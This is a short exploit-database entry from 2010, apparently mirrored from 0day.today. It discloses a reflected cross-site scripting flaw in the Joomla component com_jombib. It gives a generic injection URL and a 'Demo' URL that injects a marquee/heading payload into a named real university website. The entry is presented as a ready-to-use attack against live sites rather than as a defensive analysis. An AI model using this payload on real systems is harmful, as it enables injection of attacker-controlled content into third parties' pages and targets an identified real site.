id: 12290
date: 05/19/2010
title: Joomla Component com_jombib XSS Vulnerability
author: s4r4d0
cves: 

=============================================
Joomla Component com_jombib XSS Vulnerability
=============================================


[x] Joomla Component Jombib
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team: Fatal Error
[x] Bug: XSS on Component Jombib
[x] Example: http://www.site.com/index.php?option=com_jombib=[XSS]
[x] Demo: http://www.lec.df.uba.ar/index.php?option=com_jombib=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil



#  0day.today [2023-03-24]  #